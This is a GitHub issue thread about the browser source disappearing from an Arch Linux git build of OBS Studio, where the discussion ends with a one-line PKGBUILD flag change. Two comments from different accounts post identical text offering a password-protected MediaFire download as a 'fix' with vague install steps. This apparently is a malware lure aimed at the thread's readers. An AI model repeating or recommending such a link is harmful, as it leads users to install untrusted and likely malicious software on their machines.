### ISSUE TITLE
URL/Browser Source Disappeared on Git Version

### ISSUE THREAD

**Issue by sangoku116** [obsproject/obs-studio#11227]
### Operating System Info

Other

### Other OS

Arch Linux

### OBS Studio Version

Git

### OBS Studio Log URL

https://obsproject.com/logs/DW8HT1aTgtjYOhts

### Expected Behavior

Browser sources should still be present and be in the list of possible new sources.

### Current Behavior

All the browser sources became a file symbol. There is no URL/Browser option when adding a source.
![7950e3c8250e127cf61508dcb8c44f0e](https://github.com/user-attachments/assets/5e3af752-b7ef-46a3-913a-c3e136222a17)

### Steps to Reproduce

1.  Launch OBS 
2. Press + in Sources
3. There is no URL/Browser Option
...

**Comment by tytan652** [comment]
This is a packaging issue, please report it to the packager.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by xiota** [comment]
CEF binary changed.  See [`99-cef.json`](https://github.com/obsproject/obs-studio/blob/master/build-aux/modules/99-cef.json) for current version.

**Comment by rob215x** [comment]
@xiota so how do I fix it? It built just fine on another machine just a week ago and I have the same exact version of the CEF binary on both machines

**Comment by tytan652** [comment]
This sounds more likely to be a support request rather than a bug report, and we are not currently accepting support requests on GitHub Issues. Please use our [forums](https://obsproject.com/forum/) or [Discord](https://obsproject.com/discord/) for further assistance.

**Comment by xiota** [comment]
Also, options changed.   The PKGBUILD needs to be updated.  See [Building-OBS-Studio](https://github.com/obsproject/obs-studio/wiki/Building-OBS-Studio).

**Comment by tytan652** [comment]
> CEF binary changed. See [`99-cef.json`](https://github.com/obsproject/obs-studio/blob/master/build-aux/modules/99-cef.json) for current version.

@xiota, the change is unrelated. OBS Studio can still be built with CEF 103/5060.

**Comment by rob215x** [comment]
I just solved this myself by changing ONE line in my PKGBUILD:

Change the line with "-DBUILD_BROWSER=ON \" to
```
    -DENABLE_BROWSER=ON \
```
